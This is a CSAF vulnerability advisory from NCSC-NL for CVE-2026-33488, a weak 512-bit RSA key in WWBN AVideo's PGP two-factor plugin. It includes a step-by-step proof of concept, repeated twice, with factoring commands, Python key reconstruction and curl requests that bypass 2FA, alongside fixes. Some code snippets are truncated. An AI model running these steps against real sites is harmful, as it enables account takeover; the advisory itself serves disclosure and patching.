{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33488", "tracking": { "current_release_date": "2026-03-26T00:49:56.790922Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33488", "initial_release_date": "2026-03-20T21:41:02.753049Z", "revision_history": [ { "date": "2026-03-20T21:41:02.753049Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T21:41:06.291247Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-23T22:27:03.270102Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T22:27:06.987667Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T02:23:13.300868Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T02:23:19.307364Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:51:18.305733Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-03-24T20:51:27.007735Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:52:43.579036Z", "number": "9", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T20:52:46.591193Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:25.450090Z", "number": "11", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:28.328120Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-25T21:02:09.634325Z", "number": "13", "summary": "References created (2)." }, { "date": "2026-03-25T21:02:19.127841Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:49:51.028562Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33488", "cwe": { "id": "CWE-326", "name": "Inadequate Encryption Strength" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe `createKeys()` function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users.\n\n## Details\n\nThe vulnerability originates in `plugin/LoginControl/pgp/functions.php` at line 26:\n\n```php\n// plugin/LoginControl/pgp/functions.php:26\n$privateKey = RSA::createKey(512);\n```\n\nThis code was copied from the `singpolyma/openpgp-php` library's example/demo code, which was never intended for production use. The entire PGP 2FA flow relies on these weak keys:\n\n1. **Key generation**: When a user enables PGP 2FA, the UI calls `createKeys()` which generates a 512-bit RSA keypair. The public key is saved to the database via `savePublicKey.json.php`.\n\n2. **Challenge creation** (`LoginControl.php:520-531`): During login, a `uniqid()` token is generated, stored in the session, and encrypted with the user's stored public key:\n```php\n// LoginControl.php:525-530\n$_SESSION['user']['challenge']['text'] = uniqid();\n$encMessage = self::encryptPGPMessage(User::getId(), $_SESSION['user']['challenge']['text']);\n```\n\n3. **Challenge verification** (`LoginControl.php:533-539`): The user must decrypt the challenge and submit the plaintext. Verification is a simple equality check:\n```php\n// LoginControl.php:534\nif ($response == $_SESSION['user']['challenge']['text']) {\n```\n\nSince 512-bit RSA was publicly factored in 1999 (RSA-155 challenge), an attacker who obtains the public key can factor the modulus using freely available tools (CADO-NFS, msieve, yafu) in a matter of hours on modern hardware, reconstruct the complete private key from the prime factors, and decrypt any challenge encrypted with that key.\n\n**Unauthenticated endpoints** (compounding issue):\n\n`generateKeys.json.php` does not include `configuration.php` and has no authentication check:\n```php\n// plugin/LoginControl/pgp/generateKeys.json.php:1-2\n/dev/null\ngpg --list-keys --with-key-data | grep '^pub'\n# Or use Python:\npython3 -c \"\nfrom Crypto.PublicKey import RSA\n# Parse the PGP key and extract RSA modulus N\n# N will be a ~155-digit number (512 bits)\nprint(f'N = {key.n}')\n\"\n```\n\n**Step 3: Factor the 512-bit modulus**\n\n```bash\n# Using CADO-NFS (typically completes in 2-8 hours on a modern desktop)\ncado-nfs.py \n# Or using msieve:\nmsieve -v \n# Output: p = , q = \n```\n\n**Step 4: Reconstruct the private key and decrypt the 2FA challenge**\n\n```python\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import inverse\n\n# From factoring step\np = \nq = \nn = p * q\ne = 65537\nd = inverse(e, (p-1)*(q-1))\n\n# Reconstruct private key\nprivkey = RSA.construct((n, e, d, p, q))\n\n# Decrypt the PGP-encrypted challenge from the login page\n# and submit the plaintext to verifyChallenge.json.php\n```\n\n**Step 5: Submit decrypted challenge to bypass 2FA**\n\n```bash\ncurl -b \"session_cookie\" \\\n \"https://target/plugin/LoginControl/pgp/verifyChallenge.json.php\" \\\n -d \"response=\"\n# Expected: {\"error\":false,\"msg\":\"\",\"response\":\"\"}\n```\n\n**Unauthenticated endpoint abuse:**\n\n```bash\n# No authentication required — CPU-intensive 512-bit RSA keygen\ncurl \"https://target/plugin/LoginControl/pgp/generateKeys.json.php?keyPassword=test&keyName=test&keyEmail=test@test.com\"\n# Returns: {\"error\":false,\"public\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----...\",\"private\":\"-----BEGIN PGP PRIVATE KEY BLOCK-----...\"}\n```\n\n## Impact\n\n- **2FA Bypass**: Any user who enabled PGP 2FA using the built-in key generator has their second factor effectively nullified. An attacker with knowledge of the password (phishing, credential stuffing, breach reuse) can bypass the 2FA protection entirely.\n- **Account Takeover**: Combined with any credential compromise, this enables full account takeover of 2FA-protected accounts.\n- **Denial of Service**: The unauthenticated `generateKeys.json.php` endpoint allows anonymous users to trigger CPU-intensive RSA key generation operations with no rate limiting.\n- **Scope**: All users who enabled PGP 2FA using the application's built-in key generator are affected. Users who imported their own externally-generated keys with adequate key sizes (2048+ bits) are not affected by the key weakness, but the unauthenticated endpoints affect all deployments with the LoginControl plugin.\n\n## Recommended Fix\n\n**1. Increase RSA key size to 2048 bits minimum** (`plugin/LoginControl/pgp/functions.php:26`):\n\n```php\n// Before:\n$privateKey = RSA::createKey(512);\n\n// After:\n$privateKey = RSA::createKey(2048);\n```\n\n**2. Add authentication to `generateKeys.json.php`** (match the pattern used in `decryptMessage.json.php`):\n\n```php\nerror = true;\n\n$plugin = AVideoPlugin::loadPluginIfEnabled('LoginControl');\n\nif (!User::isLogged()) {\n $obj->msg = \"Authentication required\";\n die(json_encode($obj));\n}\n// ... rest of existing code\n```\n\n**3. Add authentication to `encryptMessage.json.php`** (same pattern):\n\n```php\nmsg = 'Authentication required';\n die(json_encode($obj));\n}\n```\n\n**4. Add minimum key size validation in `savePublicKey.json.php`** to reject weak keys regardless of how they were generated:\n\n```php\n// After line 26, before saving:\n$keyData = OpenPGP_Message::parse(OpenPGP::unarmor($_REQUEST['publicKey'], 'PGP PUBLIC KEY BLOCK'));\nif ($keyData && $keyData[0] instanceof OpenPGP_PublicKeyPacket) {\n $bitLength = strlen($keyData[0]->key['n']) * 8;\n if ($bitLength < 2048) {\n $obj->msg = \"Key size too small. Minimum 2048 bits required.\";\n die(json_encode($obj));\n }\n}\n```", "title": "github - https://api.github.com/advisories/GHSA-6m5f-j7w2-w953" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33488.json" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33488" }, { "category": "description", "text": "## Summary\n\nThe `createKeys()` function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users.\n\n## Details\n\nThe vulnerability originates in `plugin/LoginControl/pgp/functions.php` at line 26:\n\n```php\n// plugin/LoginControl/pgp/functions.php:26\n$privateKey = RSA::createKey(512);\n```\n\nThis code was copied from the `singpolyma/openpgp-php` library's example/demo code, which was never intended for production use. The entire PGP 2FA flow relies on these weak keys:\n\n1. **Key generation**: When a user enables PGP 2FA, the UI calls `createKeys()` which generates a 512-bit RSA keypair. The public key is saved to the database via `savePublicKey.json.php`.\n\n2. **Challenge creation** (`LoginControl.php:520-531`): During login, a `uniqid()` token is generated, stored in the session, and encrypted with the user's stored public key:\n```php\n// LoginControl.php:525-530\n$_SESSION['user']['challenge']['text'] = uniqid();\n$encMessage = self::encryptPGPMessage(User::getId(), $_SESSION['user']['challenge']['text']);\n```\n\n3. **Challenge verification** (`LoginControl.php:533-539`): The user must decrypt the challenge and submit the plaintext. Verification is a simple equality check:\n```php\n// LoginControl.php:534\nif ($response == $_SESSION['user']['challenge']['text']) {\n```\n\nSince 512-bit RSA was publicly factored in 1999 (RSA-155 challenge), an attacker who obtains the public key can factor the modulus using freely available tools (CADO-NFS, msieve, yafu) in a matter of hours on modern hardware, reconstruct the complete private key from the prime factors, and decrypt any challenge encrypted with that key.\n\n**Unauthenticated endpoints** (compounding issue):\n\n`generateKeys.json.php` does not include `configuration.php` and has no authentication check:\n```php\n// plugin/LoginControl/pgp/generateKeys.json.php:1-2\n/dev/null\ngpg --list-keys --with-key-data | grep '^pub'\n# Or use Python:\npython3 -c \"\nfrom Crypto.PublicKey import RSA\n# Parse the PGP key and extract RSA modulus N\n# N will be a ~155-digit number (512 bits)\nprint(f'N = {key.n}')\n\"\n```\n\n**Step 3: Factor the 512-bit modulus**\n\n```bash\n# Using CADO-NFS (typically completes in 2-8 hours on a modern desktop)\ncado-nfs.py \n# Or using msieve:\nmsieve -v \n# Output: p = , q = \n```\n\n**Step 4: Reconstruct the private key and decrypt the 2FA challenge**\n\n```python\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import inverse\n\n# From factoring step\np = \nq = \nn = p * q\ne = 65537\nd = inverse(e, (p-1)*(q-1))\n\n# Reconstruct private key\nprivkey = RSA.construct((n, e, d, p, q))\n\n# Decrypt the PGP-encrypted challenge from the login page\n# and submit the plaintext to verifyChallenge.json.php\n```\n\n**Step 5: Submit decrypted challenge to bypass 2FA**\n\n```bash\ncurl -b \"session_cookie\" \\\n \"https://target/plugin/LoginControl/pgp/verifyChallenge.json.php\" \\\n -d \"response=\"\n# Expected: {\"error\":false,\"msg\":\"\",\"response\":\"\"}\n```\n\n**Unauthenticated endpoint abuse:**\n\n```bash\n# No authentication required — CPU-intensive 512-bit RSA keygen\ncurl \"https://target/plugin/LoginControl/pgp/generateKeys.json.php?keyPassword=test&keyName=test&keyEmail=test@test.com\"\n# Returns: {\"error\":false,\"public\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----...\",\"private\":\"-----BEGIN PGP PRIVATE KEY BLOCK-----...\"}\n```\n\n## Impact\n\n- **2FA Bypass**: Any user who enabled PGP 2FA using the built-in key generator has their second factor effectively nullified. An attacker with knowledge of the password (phishing, credential stuffing, breach reuse) can bypass the 2FA protection entirely.\n- **Account Takeover**: Combined with any credential compromise, this enables full account takeover of 2FA-protected accounts.\n- **Denial of Service**: The unauthenticated `generateKeys.json.php` endpoint allows anonymous users to trigger CPU-intensive RSA key generation operations with no rate limiting.\n- **Scope**: All users who enabled PGP 2FA using the application's built-in key generator are affected. Users who imported their own externally-generated keys with adequate key sizes (2048+ bits) are not affected by the key weakness, but the unauthenticated endpoints affect all deployments with the LoginControl plugin.\n\n## Recommended Fix\n\n**1. Increase RSA key size to 2048 bits minimum** (`plugin/LoginControl/pgp/functions.php:26`):\n\n```php\n// Before:\n$privateKey = RSA::createKey(512);\n\n// After:\n$privateKey = RSA::createKey(2048);\n```\n\n**2. Add authentication to `generateKeys.json.php`** (match the pattern used in `decryptMessage.json.php`):\n\n```php\nerror = true;\n\n$plugin = AVideoPlugin::loadPluginIfEnabled('LoginControl');\n\nif (!User::isLogged()) {\n $obj->msg = \"Authentication required\";\n die(json_encode($obj));\n}\n// ... rest of existing code\n```\n\n**3. Add authentication to `encryptMessage.json.php`** (same pattern):\n\n```php\nmsg = 'Authentication required';\n die(json_encode($obj));\n}\n```\n\n**4. Add minimum key size validation in `savePublicKey.json.php`** to reject weak keys regardless of how they were generated:\n\n```php\n// After line 26, before saving:\n$keyData = OpenPGP_Message::parse(OpenPGP::unarmor($_REQUEST['publicKey'], 'PGP PUBLIC KEY BLOCK'));\nif ($keyData && $keyData[0] instanceof OpenPGP_PublicKeyPacket) {\n $bitLength = strlen($keyData[0]->key['n']) * 8;\n if ($bitLength < 2048) {\n $obj->msg = \"Key size too small. Minimum 2048 bits required.\";\n die(json_encode($obj));\n }\n}\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-6m5f-j7w2-w953.json?alt=media" }, { "category": "other", "text": "0.00029", "title": "EPSS" }, { "category": "other", "text": "3.7", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, The value of the most recent EPSS score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-6m5f-j7w2-w953" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33488.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33488" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-6m5f-j7w2-w953.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-6m5f-j7w2-w953" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33488" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33488" } ] }